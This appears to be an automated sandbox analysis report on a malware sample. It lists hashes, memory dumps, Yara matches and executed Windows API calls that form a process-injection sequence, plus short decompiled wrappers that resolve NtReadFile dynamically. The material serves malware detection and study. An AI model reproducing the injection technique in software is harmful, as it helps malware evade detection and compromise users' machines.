                                                      • Opcode Fuzzy Hash: d999e4a8dcf1119583b1d149cd2ec54f7d7d155f8b480c06889b5a6ca78db6dd
                                                      • Instruction Fuzzy Hash: 24D18B35D00209DFCB05EF94C884C9DBBBAFF4A304B1580A6E915AB261DB31FD56DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 395c1c7028ca9e2a5ffb8abf1a160d649da792b66c0b339eb383417792ffa375
                                                      • Instruction ID: f9fa829ab67e9bc9ce6b8f9041a6f07bba29a47a32557bf2f1546d59ea957a3c
                                                      • Opcode Fuzzy Hash: 395c1c7028ca9e2a5ffb8abf1a160d649da792b66c0b339eb383417792ffa375
                                                      • Instruction Fuzzy Hash: EBC17635D00109DFCB21DFA4C980C9DBBBAFF49308B208195EA59AB325DB31E995DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1afc344f384ed40d9ce605adba36caa7314d8389647a1d112aa668a5d559d3ca
                                                      • Instruction ID: 13c05812ba17a338611b5a6b69f9d263912aec5cad2e633ef8e74815d989a32e
                                                      • Opcode Fuzzy Hash: 1afc344f384ed40d9ce605adba36caa7314d8389647a1d112aa668a5d559d3ca
                                                      • Instruction Fuzzy Hash: 2AC13735D00119DFCB21DFA4C984C9DBBBAFF49304B208195E919AB325DB31E995DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4eecf029e59c1fa251eb4349155f0943ddbf4e5e46e5c8b4762e8a1cb2ba63b
                                                      • Instruction ID: b6fce16d905307f07cfa29610e89fc4c4f18ac8e61cc6dbdf5d8789fe84b8354
                                                      • Opcode Fuzzy Hash: c4eecf029e59c1fa251eb4349155f0943ddbf4e5e46e5c8b4762e8a1cb2ba63b
                                                      • Instruction Fuzzy Hash: AC718031904249DFCB01DFA4D8808DDBBB6FF4A304B15809AE915EB261D731FD56CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c603c777cca13e0e770076d0b3a331d4e21a5d222a07d613ff1b00f0fe229804
                                                      • Instruction ID: 2ccb73f6cf0d3f84b99647b9f1e2ed44167c30b9a6f59670d753081ca0fb3d0c
                                                      • Opcode Fuzzy Hash: c603c777cca13e0e770076d0b3a331d4e21a5d222a07d613ff1b00f0fe229804
                                                      • Instruction Fuzzy Hash: 90518C35D00209DFCB11DFA8D880C9DBBB6FF4A304B1580A9E915AB261D731FD56CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3bfa75e510d0412a7acdf6acec85345152f22834df9ec244e9524dc1643983b
                                                      • Instruction ID: a6210ca458f69482422b6a30c7fdb3e8c3cfaf80ecc3526be34efeb4e5c397ff
                                                      • Opcode Fuzzy Hash: b3bfa75e510d0412a7acdf6acec85345152f22834df9ec244e9524dc1643983b
                                                      • Instruction Fuzzy Hash: DE51CD35D00109DFCB01EF94D884CADBBB6FF8A314B1480A6E911AB261DB31FD56CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 05023975
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 05023975
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID:
                                                      • API String ID: 1778838933-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502AC66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0502AC66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0502EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01015421
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377618646.0000000001010000.00000040.00000001.sdmp, Offset: 01010000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01015421
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377618646.0000000001010000.00000040.00000001.sdmp, Offset: 01010000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0502BC30
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0502B556
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 0502B556
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502BB01
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 050228BB
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0502ECA9,00000800,00000000,00000000), ref: 0502EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 050228BB
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0502BB01
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0502BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0502ECA9,00000800,00000000,00000000), ref: 0502EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 53d8dad4407d96d63945021a6ff6b118b7ae2a078c45652b9d37e6528ae0c7c0
                                                      • Instruction ID: 7b549e5df145cb0053df4c935a0b2dc837251459a2e3faae53969f85e2eb6f44
                                                      • Opcode Fuzzy Hash: 53d8dad4407d96d63945021a6ff6b118b7ae2a078c45652b9d37e6528ae0c7c0
                                                      • Instruction Fuzzy Hash: 221146B19083588BCB10DFAAC8457EEBBF5EF88324F14842AD519B7640C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 82f7fc20c4ad93a5d240ea0220cb4e96688e3903f487afc0c6d32a39a5f07219
                                                      • Instruction ID: 1823f1c5d2fac30dc4d59b5dd9a4df4f4e3145af6e144553e181d982d767c189
                                                      • Opcode Fuzzy Hash: 82f7fc20c4ad93a5d240ea0220cb4e96688e3903f487afc0c6d32a39a5f07219
                                                      • Instruction Fuzzy Hash: DC1125B1D083588BCB10DFAAC8457EEBBF5AF88228F15841AD519A7640CB74A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0502EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.387365346.0000000005020000.00000040.00000001.sdmp, Offset: 05020000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 6eedfe3265a4570472280d4d22aaeb5a69e4ae50e7607cb9f273dbb4d073eb87
                                                      • Instruction ID: 9d188800f5fbca7602ba9c56634ad3e161b234c5a4bdabbd5842e19fa5c4aab5
                                                      • Opcode Fuzzy Hash: 6eedfe3265a4570472280d4d22aaeb5a69e4ae50e7607cb9f273dbb4d073eb87
                                                      • Instruction Fuzzy Hash: 0911DFB6C047598FCB10CF9AD444AEEFBF8EB88324F14841AD859A7610C375A546CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377411007.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f71470ec96e9205abdad98fa945614c462e60fe318890f63de2c3f7224b0ad6a
                                                      • Instruction ID: a5321a561975dd95940925740a74c2902dbb8d8176dd1c64472e269ef2b4e650
                                                      • Opcode Fuzzy Hash: f71470ec96e9205abdad98fa945614c462e60fe318890f63de2c3f7224b0ad6a
                                                      • Instruction Fuzzy Hash: EE2125B5508244EFDB00DF18DDC0BA7BB65FB84318F24C5A9D9095B246D336D846CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377411007.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 160c55156eb95c146c39425625c3806d82299980a852a736bf6cea8fd3a176a8
                                                      • Instruction ID: cc8c4d5f083a1007f906dd8ae39f216cbca4c488785f5794c4578fbb8cfd9bdc
                                                      • Opcode Fuzzy Hash: 160c55156eb95c146c39425625c3806d82299980a852a736bf6cea8fd3a176a8
                                                      • Instruction Fuzzy Hash: 31119075908280DFDB11CF14D9C4B56BF71FB84318F24C6A9D8494B656C33AD85ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                       C-Code - Quality: 21%
                                                       			E00419FCB(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                       				char* _t6;
                                                       				char* _t12;
                                                       				intOrPtr _t13;
                                                       				void* _t18;
                                                       				void* _t30;
                                                       				void* _t31;
                                                       				intOrPtr* _t32;
                                                       				void* _t34;
                                                       
                                                       				asm("out dx, al");
                                                       				_t13 = _a4;
                                                       				_t32 = _a4 + 0xc48; // slot in the caller-supplied context block that holds the resolved NtReadFile pointer
                                                       				E0041AB20(_t30, _t13, _t32,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // resolves API index 0x2a into *_t32
                                                       				_t6 =  &_a32; // 0x414d32
                                                       				_t12 =  &_a8; // 0x414d32
                                                       				_t18 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t31, _t34); // executed: indirect call through the resolved pointer
                                                       				return _t18;
                                                       			}

                                                       Instruction addresses: 0x00419fcd, 0x00419fd3, 0x00419fdf, 0x00419fe7, 0x00419ff2, 0x0041a00d, 0x0041a015, 0x0041a019

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: 281dbbc749f979fc6bedcc6790a5ecfb51adedd7a5c1d213caeaf868a75c54b3
                                                      • Instruction ID: 8e4cf4b82d85156bb2446e6a731f4473496e48ed0f8fdcbfa0ed6d91aa36dd0d
                                                      • Opcode Fuzzy Hash: 281dbbc749f979fc6bedcc6790a5ecfb51adedd7a5c1d213caeaf868a75c54b3
                                                      • Instruction Fuzzy Hash: FBF01DB2200104AFDB08DF89DC90EEB77AAEF8C354F05824DBA0D97251C630EC11CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       C-Code - Quality: 37%
                                                       			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                       				char* _t6;
                                                       				char* _t12;
                                                       				intOrPtr _t13;
                                                       				void* _t18;
                                                       				void* _t27;
                                                       				intOrPtr* _t28;
                                                       
                                                       				_t13 = _a4;
                                                       				_t28 = _a4 + 0xc48; // slot in the caller-supplied context block that holds the resolved NtReadFile pointer
                                                       				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // resolves API index 0x2a into *_t28
                                                       				_t6 =  &_a32; // 0x414d32
                                                       				_t12 =  &_a8; // 0x414d32
                                                       				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed: indirect call through the resolved pointer
                                                       				return _t18;
                                                       			}

                                                       Instruction addresses: 0x00419fd3, 0x00419fdf, 0x00419fe7, 0x00419ff2, 0x0041a00d, 0x0041a015, 0x0041a019

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: wKA
                                                      • API String ID: 823142352-3165208591
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: f15830d4444844ffdc0beff8450139817a952b4176aa1ea4a0c6281064f0bf72
                                                      • Instruction ID: 571e54225e9a84c50c064e397d93fbff457028bc279ef30381ad58d3682feb45
                                                      • Opcode Fuzzy Hash: f15830d4444844ffdc0beff8450139817a952b4176aa1ea4a0c6281064f0bf72
                                                      • Instruction Fuzzy Hash: B50116B2604108AFCB18DF99DC81EEB77A9AF8C724F158249FA1DD7241C630E811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
                                                      • Instruction ID: c5c621940a57d17f66b12aa8049194c8c7dd627cdda69f22228ad45a8916282e
                                                      • Opcode Fuzzy Hash: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
                                                      • Instruction Fuzzy Hash: 9F0112B5D4020DA7DB10EBE5DC82FDEB7799B54308F0041AAE908A7281F635EB54C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: a19a9a3ae40787789c4ca0ed9c00c04bdc2201e018a114e2c346f844656288dd
                                                      • Instruction ID: 97542a015bcf4af9255fb6ea6bd5923b4e071d1999698dcaab2582627b82682b
                                                      • Opcode Fuzzy Hash: a19a9a3ae40787789c4ca0ed9c00c04bdc2201e018a114e2c346f844656288dd
                                                      • Instruction Fuzzy Hash: D8F05EB1200108AFDB14DF99CC45EEB77B9EF88354F15815DFA09A7241C636E811CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: f98400962133b53badd0b1044dd544b390ab3cad03e846cd19baea7985819aa8
                                                      • Instruction ID: 0aea7db4517e1d8f192aa3b1af7a0cd7a15af9a0d871c41797294b2989b1bf48
                                                      • Opcode Fuzzy Hash: f98400962133b53badd0b1044dd544b390ab3cad03e846cd19baea7985819aa8
                                                      • Instruction Fuzzy Hash: 0FD01776200218BBE710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f8f3fddeb0e9e62ab3e68e086503c2523d3424adb7c16fd1fe1ed75944782615
                                                      • Instruction ID: bb0c33b298e4b371b552dd78a12cfac85b8108857491959cf55bd3577a856d0b
                                                      • Opcode Fuzzy Hash: f8f3fddeb0e9e62ab3e68e086503c2523d3424adb7c16fd1fe1ed75944782615
                                                      • Instruction Fuzzy Hash: DE9002B130100802D544719A55047460009A7D0341F51C015A5455554ECB9A8DE576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f956f83cdc3b6c4ebfeb83fcc144ea953825b6f0986441757de724ef6d9fab65
                                                      • Instruction ID: 0e4f50035494d14098ec3471235e3a6ab613fd0f8d861aadd7d76a173a84dbde
                                                      • Opcode Fuzzy Hash: f956f83cdc3b6c4ebfeb83fcc144ea953825b6f0986441757de724ef6d9fab65
                                                      • Instruction Fuzzy Hash: 2E9002A134100842D504619A5514B060009E7E1341F51C019E1455554DCB5ACC627166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1d0e7750b204099d739529f408644c204a949a56f101fa2f733daef1ae28b775
